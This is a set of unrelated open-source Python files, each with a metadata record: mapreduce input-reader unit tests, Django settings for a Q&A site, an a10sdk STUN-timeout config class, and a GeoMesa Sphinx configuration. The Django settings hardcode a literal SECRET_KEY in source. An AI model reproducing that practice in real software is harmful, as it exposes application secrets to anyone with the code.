reader = input_readers.BlobstoreZipInputReader("", 0, 1, self.mockZipReader)
reader.next()
self.assertRaises(StopIteration, reader.next)
def testSplitInput(self):
"""Test that split_input functions as expected."""
mapper_spec = model.MapperSpec.from_json({
"mapper_handler_spec": "FooHandler",
"mapper_input_reader": self.READER_NAME,
"mapper_params": {"blob_key": ["foo"]},
"mapper_shard_count": 2})
readers = input_readers.BlobstoreZipInputReader.split_input(
mapper_spec, self.mockZipReader)
self.assertEqual(len(readers), 2)
self.assertEqual(str(readers[0]), "blobstore.BlobKey(['foo']):[0, 7]")
self.assertEqual(str(readers[1]), "blobstore.BlobKey(['foo']):[7, 10]")
def testJson(self):
"""Test that we can persist/restore using the json mechanism."""
reader = input_readers.BlobstoreZipInputReader("someblob", 0, 1,
self.mockZipReader)
json = reader.to_json()
self.assertEquals({"blob_key": "someblob",
"start_index": 0,
"end_index": 1},
json)
reader2 = input_readers.BlobstoreZipInputReader.from_json(json)
self.assertEqual(str(reader), str(reader2))
class BlobstoreZipLineInputReaderTest(unittest.TestCase):
READER_NAME = ("mapreduce.input_readers."
"BlobstoreZipLineInputReader")
def setUp(self):
unittest.TestCase.setUp(self)
self.appid = "testapp"
os.environ["APPLICATION_ID"] = self.appid
def create_zip_data(self, blob_count):
"""Create blob_count blobs with uneven zip data."""
self.zipdata = {}
blob_keys = []
for blob_number in range(blob_count):
stream = cStringIO.StringIO()
archive = zipfile.ZipFile(stream, "w")
for file_number in range(3):
lines = []
for i in range(file_number + 1):
lines.append("archive %s file %s line %s" %
(blob_number, file_number, i))
archive.writestr("%d.txt" % file_number, "\n".join(lines))
archive.close()
blob_key = "blob%d" % blob_number
self.zipdata[blob_key] = stream
blob_keys.append(blob_key)
return blob_keys
def mockZipReader(self, blob_key):
"""Mocked out reader function that returns our in-memory zipfile."""
return self.zipdata.get(blob_key)
def split_input(self, blob_count, shard_count):
"""Generate some blobs and return the reader's split of them."""
blob_keys = self.create_zip_data(blob_count)
mapper_spec = model.MapperSpec.from_json({
"mapper_handler_spec": "FooHandler",
"mapper_input_reader": self.READER_NAME,
"mapper_params": {"blob_keys": blob_keys},
"mapper_shard_count": shard_count})
readers = input_readers.BlobstoreZipLineInputReader.split_input(
mapper_spec, self.mockZipReader)
return readers
def testSplitInputOneBlob(self):
"""Simple case: split one blob into two groups."""
readers = self.split_input(1, 2)
self.assertEqual(2, len(readers))
self.assertEqual("blobstore.BlobKey('blob0'):[0, 2]:0", str(readers[0]))
self.assertEqual("blobstore.BlobKey('blob0'):[2, 3]:0", str(readers[1]))
def testSplitInputOneBlobFourShards(self):
"""Corner case: Ask for more shards than we can deliver."""
readers = self.split_input(1, 4)
self.assertEqual(2, len(readers))
self.assertEqual("blobstore.BlobKey('blob0'):[0, 2]:0", str(readers[0]))
self.assertEqual("blobstore.BlobKey('blob0'):[2, 3]:0", str(readers[1]))
def testSplitInputTwoBlobsTwoShards(self):
"""Simple case: Ask for num shards == num blobs."""
readers = self.split_input(2, 2)
self.assertEqual(2, len(readers))
self.assertEqual("blobstore.BlobKey('blob0'):[0, 3]:0", str(readers[0]))
self.assertEqual("blobstore.BlobKey('blob1'):[0, 3]:0", str(readers[1]))
def testSplitInputTwoBlobsFourShards(self):
"""Easy case: Files split nicely into blobs."""
readers = self.split_input(2, 4)
self.assertEqual(4, len(readers))
self.assertEqual("blobstore.BlobKey('blob0'):[0, 2]:0", str(readers[0]))
self.assertEqual("blobstore.BlobKey('blob0'):[2, 3]:0", str(readers[1]))
self.assertEqual("blobstore.BlobKey('blob1'):[0, 2]:0", str(readers[2]))
self.assertEqual("blobstore.BlobKey('blob1'):[2, 3]:0", str(readers[3]))
def testSplitInputTwoBlobsSixShards(self):
"""Corner case: Shards don't split nicely so we get too few."""
readers = self.split_input(2, 6)
# Note we might be able to make this return 6 with a more clever algorithm.
self.assertEqual(4, len(readers))
self.assertEqual("blobstore.BlobKey('blob0'):[0, 2]:0", str(readers[0]))
self.assertEqual("blobstore.BlobKey('blob0'):[2, 3]:0", str(readers[1]))
self.assertEqual("blobstore.BlobKey('blob1'):[0, 2]:0", str(readers[2]))
self.assertEqual("blobstore.BlobKey('blob1'):[2, 3]:0", str(readers[3]))
def testSplitInputTwoBlobsThreeShards(self):
"""Corner case: Shards don't split nicely so we get too few."""
readers = self.split_input(2, 3)
# Note we might be able to make this return 3 with a more clever algorithm.
self.assertEqual(2, len(readers))
self.assertEqual("blobstore.BlobKey('blob0'):[0, 3]:0", str(readers[0]))
self.assertEqual("blobstore.BlobKey('blob1'):[0, 3]:0", str(readers[1]))
def testSplitInputThreeBlobsTwoShards(self):
"""Corner case: More blobs than requested shards."""
readers = self.split_input(3, 2)
self.assertEqual(3, len(readers))
self.assertEqual("blobstore.BlobKey('blob0'):[0, 3]:0", str(readers[0]))
self.assertEqual("blobstore.BlobKey('blob1'):[0, 3]:0", str(readers[1]))
self.assertEqual("blobstore.BlobKey('blob2'):[0, 3]:0", str(readers[2]))
def testReadOneLineFile(self):
"""Test that the first file in the zip is returned correctly."""
self.create_zip_data(1)
reader = input_readers.BlobstoreZipLineInputReader("blob0", 0, 1, 0,
self.mockZipReader)
offset_info, line = reader.next()
self.assertEqual(("blob0", 0, 0), offset_info)
self.assertEqual("archive 0 file 0 line 0", line)
# This file only has one line.
self.assertRaises(StopIteration, reader.next)
def testReadTwoLineFile(self):
"""Test that the second file in the zip is returned correctly."""
self.create_zip_data(1)
reader = input_readers.BlobstoreZipLineInputReader("blob0", 1, 2, 0,
self.mockZipReader)
offset_info, line = reader.next()
self.assertEqual(("blob0", 1, 0), offset_info)
self.assertEqual("archive 0 file 1 line 0", line)
offset_info, line = reader.next()
self.assertEqual(("blob0", 1, 24), offset_info)
self.assertEqual("archive 0 file 1 line 1", line)
# This file only has two lines.
self.assertRaises(StopIteration, reader.next)
def testReadSecondLineFile(self):
"""Test that the second line is returned correctly."""
self.create_zip_data(1)
reader = input_readers.BlobstoreZipLineInputReader("blob0", 2, 3, 5,
self.mockZipReader)
offset_info, line = reader.next()
self.assertEqual(("blob0", 2, 24), offset_info)
self.assertEqual("archive 0 file 2 line 1", line)
# If we persist/restore the reader, the new one should pick up where
# we left off.
reader2 = input_readers.BlobstoreZipLineInputReader.from_json(
reader.to_json(), self.mockZipReader)
offset_info, line = reader2.next()
self.assertEqual(("blob0", 2, 48), offset_info)
self.assertEqual("archive 0 file 2 line 2", line)
def testReadAcrossFiles(self):
"""Test that we can read across all the files in the single blob."""
self.create_zip_data(1)
reader = input_readers.BlobstoreZipLineInputReader("blob0", 0, 3, 0,
self.mockZipReader)
for file_number in range(3):
for i in range(file_number + 1):
offset_info, line = reader.next()
self.assertEqual("blob0", offset_info[0])
self.assertEqual(file_number, offset_info[1])
self.assertEqual("archive %s file %s line %s" % (0, file_number, i),
line)
self.assertRaises(StopIteration, reader.next)
def testJson(self):
"""Test that we can persist/restore using the json mechanism."""
reader = input_readers.BlobstoreZipLineInputReader("blob0", 0, 3, 20,
self.mockZipReader)
json = reader.to_json()
self.assertEquals({"blob_key": "blob0",
"start_file_index": 0,
"end_file_index": 3,
"offset": 20},
json)
reader2 = input_readers.BlobstoreZipLineInputReader.from_json(json)
self.assertEqual(str(reader), str(reader2))
# Dummy start up time of a mapreduce.
STARTUP_TIME_US = 1000
class MockUnappliedQuery(object):
"""Mocks unapplied query in order to mimic existence of unapplied jobs."""
def __init__(self, results):
"""Constructs unapplied query with given results."""
self.results = results
self.has_r_filter = False
def __setitem__(self, qfilter, value):
"""Sets a query filter."""
if qfilter == '__key__ <=':
pass
elif (qfilter == '__unapplied_log_timestamp_us__ <' and
value == STARTUP_TIME_US):
self.has_unapplied_filter = True
else:
raise Exception('Unexpected filter %s %s' % (qfilter, value))
def Get(self, limit):
"""Fetches query results."""
if not self.has_unapplied_filter:
raise Exception('Unapplied filter hasn\'t been set')
if limit != input_readers.ConsistentKeyReader._BATCH_SIZE:
raise Exception('Unexpected limit %s' % limit)
return self.results
class ConsistentKeyReaderTest(unittest.TestCase):
"""Tests for the ConsistentKeyReader."""
MAPREDUCE_READER_SPEC = ('%s.%s' %
(input_readers.ConsistentKeyReader.__module__,
input_readers.ConsistentKeyReader.__name__))
def setUp(self):
"""Sets up the test harness."""
unittest.TestCase.setUp(self)
self.app_id = 'myapp'
self.kind_id = 'somekind'
self.mapper_params = {
'entity_kind': self.kind_id,
'start_time_us': STARTUP_TIME_US,
'enable_quota': False}
self.mapper_spec = model.MapperSpec.from_json({
'mapper_handler_spec': 'FooHandler',
'mapper_input_reader': ConsistentKeyReaderTest.MAPREDUCE_READER_SPEC,
'mapper_params': self.mapper_params,
'mapper_shard_count': 10})
self.reader = input_readers.ConsistentKeyReader(
self.kind_id,
[key_range.KeyRange()],
start_time_us=STARTUP_TIME_US)
os.environ['APPLICATION_ID'] = self.app_id
self.datastore = datastore_file_stub.DatastoreFileStub(
self.app_id, '/dev/null', '/dev/null')
apiproxy_stub_map.apiproxy = apiproxy_stub_map.APIProxyStubMap()
apiproxy_stub_map.apiproxy.RegisterStub('datastore_v3', self.datastore)
self.mox = mox.Mox()
def tearDown(self):
"""Verifies mox expectations."""
try:
self.mox.VerifyAll()
finally:
self.mox.UnsetStubs()
def testSplitInputNoData(self):
"""Splits empty input among several shards."""
readers = input_readers.ConsistentKeyReader.split_input(self.mapper_spec)
self.assertEquals(1, len(readers))
r = readers[0]
self.assertEquals(self.kind_id, r._entity_kind)
self.assertEquals(STARTUP_TIME_US, r.start_time_us)
self.assertEquals(None, r._key_ranges[0].key_start)
self.assertEquals(None, r._key_ranges[0].key_end)
def testSplitInput(self):
"""Splits input among several shards."""
for _ in range(100):
datastore.Put(datastore.Entity(self.kind_id))
readers = input_readers.ConsistentKeyReader.split_input(self.mapper_spec)
self.assertEquals(10, len(readers))
for r in readers:
self.assertEquals(self.kind_id, r._entity_kind)
self.assertEquals(STARTUP_TIME_US, r.start_time_us)
# The end ranges should be half openned.
self.assertEquals(None, readers[0]._key_ranges[0].key_start)
self.assertEquals(None, readers[-1]._key_ranges[0].key_end)
def testReaderGeneratorSimple(self):
"""Tests reader generator when there are no unapplied jobs."""
k1 = datastore.Put(datastore.Entity(self.kind_id))
k2 = datastore.Put(datastore.Entity(self.kind_id))
keys = list(self.reader)
self.assertEquals([k1, k2], keys)
def testReaderGeneratorSimpleWithEmptyDatastore(self):
"""Tests reader generator when there are no unapplied jobs or entities."""
keys = list(self.reader)
self.assertEquals([], keys)
def testReaderGeneratorUnappliedJobs(self):
"""Tests reader generator when there are some unapplied jobs."""
k1 = datastore.Put(datastore.Entity(self.kind_id))
k2 = datastore.Put(datastore.Entity(self.kind_id))
dummy_k1 = db.Key.from_path(
*(k1.to_path() + [input_readers.ConsistentKeyReader.DUMMY_KIND,
input_readers.ConsistentKeyReader.DUMMY_ID]))
dummy_k2 = db.Key.from_path(
*(k2.to_path() + [input_readers.ConsistentKeyReader.DUMMY_KIND,
input_readers.ConsistentKeyReader.DUMMY_ID]))
# This method is used only for unapplied query construction.
self.mox.StubOutWithMock(
key_range.KeyRange, 'make_ascending_datastore_query')
self.mox.StubOutWithMock(db, 'get')
datastore_query = datastore.Query(self.kind_id, keys_only=True)
empty_query = datastore.Query('nosuchkind')
# Applying jobs first.
key_range.KeyRange.make_ascending_datastore_query(
kind=None, keys_only=True).AndReturn(MockUnappliedQuery([k1, k2]))
db.get([dummy_k1, dummy_k2], config=mox.IgnoreArg())
key_range.KeyRange.make_ascending_datastore_query(
kind=None, keys_only=True).AndReturn(MockUnappliedQuery([]))
# Got all keys no unapplied jobs.
key_range.KeyRange.make_ascending_datastore_query(
kind=self.kind_id, keys_only=True).AndReturn(datastore_query)
key_range.KeyRange.make_ascending_datastore_query(
kind=self.kind_id, keys_only=True).AndReturn(empty_query)
self.mox.ReplayAll()
keys = list(self.reader)
self.assertEquals([k1, k2], keys)
class NamespaceInputReaderTest(unittest.TestCase):
"""Tests for NamespaceInputReader."""
MAPREDUCE_READER_SPEC = ('%s.%s' %
(input_readers.NamespaceInputReader.__module__,
input_readers.NamespaceInputReader.__name__))
def setUp(self):
unittest.TestCase.setUp(self)
self.app_id = 'myapp'
self.mapper_spec = model.MapperSpec.from_json({
'mapper_handler_spec': 'FooHandler',
'mapper_input_reader': NamespaceInputReaderTest.MAPREDUCE_READER_SPEC,
'mapper_params': {},
'mapper_shard_count': 10})
os.environ['APPLICATION_ID'] = self.app_id
self.datastore = datastore_file_stub.DatastoreFileStub(
self.app_id, '/dev/null', '/dev/null')
apiproxy_stub_map.apiproxy = apiproxy_stub_map.APIProxyStubMap()
apiproxy_stub_map.apiproxy.RegisterStub('datastore_v3', self.datastore)
def testSplitInputNoData(self):
"""Test reader with no data in datastore."""
readers = input_readers.NamespaceInputReader.split_input(self.mapper_spec)
self.assertEquals(1, len(readers))
r = readers[0]
self.assertEquals('__namespace__', r._entity_kind)
self.assertEquals(None, r._key_ranges[0].key_start)
self.assertEquals(None, r._key_ranges[0].key_end)
# test read
self.assertEquals([], list(r))
def testSplitDefaultNamespaceOnly(self):
"""Test reader with only default namespace populated."""
TestEntity().put()
readers = input_readers.NamespaceInputReader.split_input(self.mapper_spec)
self.assertEquals(1, len(readers))
r = readers[0]
self.assertEquals('__namespace__', r._entity_kind)
self.assertEquals(None, r._key_ranges[0].key_start)
self.assertEquals(None, r._key_ranges[0].key_end)
# test read
self.assertEquals([''], list(r))
def testSplitNamespacesPresent(self):
"""Test reader with multiple namespaces present."""
TestEntity().put()
for i in range(5):
namespace_manager.set_namespace(str(i))
TestEntity().put()
namespace_manager.set_namespace(None)
readers = input_readers.NamespaceInputReader.split_input(self.mapper_spec)
self.assertEquals(1, len(readers))
r = readers[0]
self.assertEquals('__namespace__', r._entity_kind)
self.assertEquals(None, r._key_ranges[0].key_start)
self.assertEquals(None, r._key_ranges[0].key_end)
# test read
self.assertEquals(['', '0', '1', '2', '3', '4'], list(r))
if __name__ == "__main__":
unittest.main()
|
{
"content_hash": "2c02d31e88aaae6f25d9ddbd12af8c79",
"timestamp": "",
"source": "github",
"line_count": 1296,
"max_line_length": 80,
"avg_line_length": 37.182870370370374,
"alnum_prop": 0.6121521509058084,
"repo_name": "akbertram/appengine-mapreduce",
"id": "7fa7420ba015d91c4aac8f9b95b5a21ec15a067b",
"size": "48909",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "python/test/mapreduce/input_readers_test.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Java",
"bytes": "421877"
},
{
"name": "JavaScript",
"bytes": "35362"
},
{
"name": "Python",
"bytes": "545778"
},
{
"name": "Shell",
"bytes": "1723"
}
],
"symlink_target": ""
}
|
import os
from unipath import FSPath as Path
import djcelery
from django.core.urlresolvers import reverse
PROJECT_DIR = Path(__file__).absolute().ancestor(3)
DEBUG = False
TEMPLATE_DEBUG = DEBUG
ADMINS = ()
MANAGERS = ADMINS
INTERNAL_IPS = ('127.0.0.1',)
# TODO: test if the next line is good for us
# SESSION_ENGINE = 'django.contrib.sessions.backends.cached_db'
TIME_ZONE = 'Asia/Jerusalem'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
gettext = lambda s: s
LANGUAGES = (
('he', gettext('Hebrew')),
('en', gettext('English')),
('ar', gettext('Arabic')),
('ru', gettext('Russian')),
)
LANGUAGE_CODE = LANGUAGES[0][0]
MODELTRANSLATION_DEFAULT_LANGUAGE = LANGUAGE_CODE
MODELTRANSLATION_FALLBACK_LANGUAGES = (LANGUAGES[0][0], LANGUAGES[1][0],
LANGUAGES[2][0], LANGUAGES[3][0])
SITE_ID = 1
USE_I18N = True
USE_L10N = True
USE_TZ = True
MEDIA_URL = '/media/'
MEDIA_ROOT = PROJECT_DIR.child('media')
STATIC_ROOT = PROJECT_DIR.child('static_root')
STATICFILES_ROOT = PROJECT_DIR.child('static')
LOCALE_PATHS = (unicode(PROJECT_DIR.child('locale')), )
STATICFILES_DIRS = [
(subdir, str(STATICFILES_ROOT.child(subdir))) for subdir in
('css', 'img', 'js', )]
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
SECRET_KEY = "'piotu34fh89v67b4c2y0[R89N21CB[YUIP'NXREQL;BYCW9"
FIXTURE_DIRS = ("fixtures", )
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'bootstrap_pagination.middleware.PaginationMiddleware',
'debug_toolbar.middleware.DebugToolbarMiddleware',
'oshot.middleware.DefaultEntity',
)
ROOT_URLCONF = 'oshot.urls'
TEMPLATE_DIRS = (
PROJECT_DIR.child('templates'),
)
TEMPLATE_CONTEXT_PROCESSORS = (
"django.contrib.auth.context_processors.auth",
"django.core.context_processors.debug",
"django.core.context_processors.i18n",
"django.core.context_processors.media",
"django.core.context_processors.static",
"django.core.context_processors.tz",
"django.core.context_processors.request",
"django.contrib.messages.context_processors.messages",
'oshot.context_processors.forms',
'social_auth.context_processors.social_auth_by_name_backends',
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.admin',
'django.contrib.humanize',
'django.contrib.admindocs',
'django.contrib.sitemaps',
'django.contrib.flatpages',
'django_extensions',
'taggit',
'social_auth',
'haystack',
'south',
'crispy_forms',
'storages',
'gunicorn',
'bootstrap_pagination',
'django_nose',
'registration',
'flatblocks',
'uuidfield',
'autoslug',
'entities',
'chosen',
'modeltranslation',
'djcelery',
'celery_haystack',
'djcelery_email',
'devserver',
'avatar',
'actstream',
'debug_toolbar',
'djsupervisor',
'django_behave',
# local apps
'qa',
'user',
'taggit_autosuggest',
# from open-Knesset
'links',
'polyorg',
)
AUTHENTICATION_BACKENDS = (
'social_auth.backends.twitter.TwitterBackend',
'social_auth.backends.facebook.FacebookBackend',
'social_auth.backends.google.GoogleOAuth2Backend',
'django.contrib.auth.backends.ModelBackend',
)
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
},
'console': {
'level': 'ERROR',
'class': 'logging.StreamHandler',
},
},
'loggers': {
'django.request': {
'handlers': ['mail_admins', 'console'],
'level': 'ERROR',
'propagate': True,
},
}
}
ACCOUNT_ACTIVATION_DAYS = 7 # One-week activation window; you may, of course, use a different value.
LOGIN_REDIRECT_URL = '/'
LOGIN_URL = '/u/login/'
DEFAULT_FROM_EMAIL = 'localshot@hasadna.org.il'
#TEST_RUNNER = 'django_nose.NoseTestSuiteRunner'
TEST_RUNNER = 'django_behave.runner.DjangoBehaveTestSuiteRunner'
SITE_ID = os.environ.get('SITE_ID', 1)
TWITTER_CONSUMER_KEY = os.environ.get('TWITTER_CONSUMER_KEY')
TWITTER_CONSUMER_SECRET = os.environ.get('TWITTER_CONSUMER_SECRET')
FACEBOOK_APP_ID = os.environ.get('FACEBOOK_APP_ID')
FACEBOOK_API_SECRET = os.environ.get('FACEBOOK_API_SECRET')
GOOGLE_OAUTH2_CLIENT_ID = os.environ.get('GOOGLE_OAUTH2_CLIENT_ID')
GOOGLE_OAUTH2_CLIENT_SECRET = os.environ.get('GOOGLE_OAUTH2_CLIENT_SECRET')
GOOGLE_OAUTH_EXTRA_SCOPE = ['https://www.googleapis.com/auth/userinfo.profile']
ADMIN_NAME = os.environ.get('ADMIN_NAME', 'open-qna')
ADMIN_EMAIL = os.environ.get('ADMIN_EMAIL', 'open-qna@hasadna.org.il')
SOCIAL_AUTH_PIPELINE = (
'social_auth.backends.pipeline.social.social_auth_user',
'social_auth.backends.pipeline.associate.associate_by_email',
'social_auth.backends.pipeline.user.get_username',
'social_auth.backends.pipeline.user.create_user',
'social_auth.backends.pipeline.social.associate_user',
'social_auth.backends.pipeline.social.load_extra_data',
'user.utils.get_user_avatar',
)
FACEBOOK_EXTENDED_PERMISSIONS = ['email', 'publish_actions']
ACCOUNT_ACTIVATION_DAYS = 4
ADMINS = [(ADMIN_NAME, ADMIN_EMAIL), ]
MANAGERS = ADMINS
HAYSTACK_CONNECTIONS = {
'default': {
'ENGINE': 'haystack.backends.whoosh_backend.WhooshEngine',
'PATH': os.path.join(PROJECT_DIR, 'whoosh_index'),
},
}
AUTO_GENERATE_AVATAR_SIZES = (75, 48)
ABSOLUTE_URL_OVERRIDES = {
'auth.user': lambda u: reverse("public-profile", args = (u.username,)),
}
AVATAR_MAX_AVATARS_PER_USER = 1
AVATAR_GRAVATAR_BACKUP = False
AVATAR_DEFAULT_URL = "http://ok-qa-media.s3.amazonaws.com/img/question_comix.png"
QNA_DEFAULT_ENTITY_ID = 277
CACHES = {
'default': {
'BACKEND':
'django.core.cache.backends.dummy.DummyCache',
}
}
LONG_CACHE_TIME = 18000 # 5 hours
MIN_EDITORS_PER_LOCALITY = 3
|
{
"content_hash": "1fbd816ef38310b616e7fa0a0582b0b6",
"timestamp": "",
"source": "github",
"line_count": 245,
"max_line_length": 100,
"avg_line_length": 29.677551020408163,
"alnum_prop": 0.670196671709531,
"repo_name": "hasadna/open-shot",
"id": "6353d4bcf829e91b85134e2dd8a4e940ecc442c6",
"size": "7312",
"binary": false,
"copies": "1",
"ref": "refs/heads/dev",
"path": "oshot/settings/base.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "40636"
},
{
"name": "JavaScript",
"bytes": "10528"
},
{
"name": "Python",
"bytes": "586576"
},
{
"name": "Shell",
"bytes": "3784"
}
],
"symlink_target": ""
}
|
from a10sdk.common.A10BaseClass import A10BaseClass
class Udp(A10BaseClass):
"""Class Description::
Set UDP STUN timeout.
Class udp supports CRUD Operations and inherits from `common/A10BaseClass`.
This class is the `"PARENT"` class for this module.`
:param port_start: {"description": "Port Range (Port Range Start)", "format": "number", "type": "number", "maximum": 65535, "minimum": 1, "optional": false}
:param port_end: {"description": "Port Range (Port Range End)", "format": "number", "type": "number", "maximum": 65535, "minimum": 1, "optional": false}
:param timeout: {"description": "STUN timeout in minutes (default: 2 minutes)", "format": "number", "type": "number", "maximum": 60, "minimum": 0, "optional": true}
:param uuid: {"description": "uuid of the object", "format": "string", "minLength": 1, "modify-not-allowed": 1, "optional": true, "maxLength": 64, "type": "string"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
URL for this object::
`https://<Hostname|Ip address>//axapi/v3/cgnv6/lsn/stun-timeout/udp/{port_start}+{port_end}`.
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.required = [ "port_start","port_end"]
self.b_key = "udp"
self.a10_url="/axapi/v3/cgnv6/lsn/stun-timeout/udp/{port_start}+{port_end}"
self.DeviceProxy = ""
self.port_start = ""
self.port_end = ""
self.timeout = ""
self.uuid = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
|
{
"content_hash": "cc64ca6b785b6eda54e60aca9339de3d",
"timestamp": "",
"source": "github",
"line_count": 42,
"max_line_length": 168,
"avg_line_length": 39.142857142857146,
"alnum_prop": 0.6192214111922141,
"repo_name": "a10networks/a10sdk-python",
"id": "83dcb3ade086dfe06cd58bb5f81257a298409263",
"size": "1644",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "a10sdk/core/cgnv6/cgnv6_lsn_stun_timeout_udp.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "6956372"
}
],
"symlink_target": ""
}
|
import sys
import os
import shlex
# themes/plugins
import sphinx_rtd_theme
from recommonmark.parser import CommonMarkParser
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.mathjax',
'sphinx_tabs.tabs',
'sphinx_copybutton'
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# Custom source parsers
source_parsers = {
'.md': CommonMarkParser,
}
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'GeoMesa'
# note: shown in our custom footer
copyright = u'2013-2021'
author = u''
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# Warning: current version numbers are handled in versions.py, which is preprocessed
# by Maven. Do not hardcode current GeoMesa version numbers here!
from target.versions import release,version,release_version,scala_binary_version
# Other versions and variables unlikely to change on every point release
url_github_archive = "https://github.com/locationtech/geomesa/archive"
url_locationtech_release = "https://repo.eclipse.org/content/repositories/geomesa-releases/org/locationtech/geomesa"
# RST appended to every file. Used for global substitions.
# (the "%(release)s" substitutions are done by the Python format() method
# prior to appending the RST epilog to each file)
rst_epilog = """
.. _GeoTools: http://geotools.org/
.. _GeoServer: http://geoserver.org/
.. _Java JDK 8: http://www.oracle.com/technetwork/java/javase/downloads/index.html
.. |release_tarball_accumulo| replace:: %(url_locationtech_release)s/geomesa-accumulo-dist_%(scala_binary_version)s/%(release_version)s/geomesa-accumulo_%(scala_binary_version)s-%(release_version)s-bin.tar.gz
.. |release_tarball_kafka| replace:: %(url_locationtech_release)s/geomesa-kafka-dist_%(scala_binary_version)s/%(release_version)s/geomesa-kafka_%(scala_binary_version)s-%(release_version)s-bin.tar.gz
.. |release_tarball_hbase| replace:: %(url_locationtech_release)s/geomesa-hbase-dist_%(scala_binary_version)s/%(release_version)s/geomesa-hbase_%(scala_binary_version)s-%(release_version)s-bin.tar.gz
.. |release_tarball_cassandra| replace:: %(url_locationtech_release)s/geomesa-cassandra-dist_%(scala_binary_version)s/%(release_version)s/geomesa-cassandra_%(scala_binary_version)s-%(release_version)s-bin.tar.gz
.. |release_source_tarball| replace:: %(url_github_archive)s/geomesa_%(scala_binary_version)s-%(release_version)s.tar.gz
.. |maven_version| replace:: 3.5.2 or later
.. |geoserver_version| replace:: 2.17.3
.. |geotools_version| replace:: 23.x
.. |accumulo_required_version| replace:: 1.7.x, 1.8.x, 1.9.x or 2.0.x
.. |accumulo_supported_versions| replace:: versions 1.7.x, 1.8.x, 1.9.x and 2.0.x
.. |hbase_required_version| replace:: 1.4.x or 2.2.x
.. |hbase_supported_versions| replace:: versions 1.4.x and 2.2.x
.. |hbase_bundled_version| replace:: 2.2.3
.. |hadoop_version| replace:: 2.8 or later
.. |zookeeper_version| replace:: 3.4.5 or later
.. |kafka_version| replace:: 0.10.x or later
.. |kafka_tested_version| replace:: 2.7.0
.. |cassandra_version| replace:: 3.x
.. |redis_version| replace:: 5.0.x
.. |kudu_version| replace:: 1.7.x
.. |spark_required_version| replace:: 2.4.x, 3.0.x or 3.1.x
.. |spark_supported_versions| replace:: versions 2.4.x, 3.0.x and 3.1.x
.. |release_version| replace:: %(release_version)s
.. |release_version_literal| replace:: ``%(release_version)s``
.. |scala_binary_version| replace:: %(scala_binary_version)s
.. |scala_release_version| replace:: ``%(scala_binary_version)s-%(release_version)s``
""" % {"release": release,
"release_version": release_version,
"scala_binary_version": scala_binary_version,
"url_locationtech_release": url_locationtech_release,
"url_github_archive": url_github_archive}
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
html_theme_options = {
'canonical_url': 'https://www.geomesa.org/documentation/',
'analytics_id': 'UA-53087457-1',
'collapse_navigation': True,
'navigation_depth': 4
}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# Customized CSS file
html_style = 'css/theme_custom.css'
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
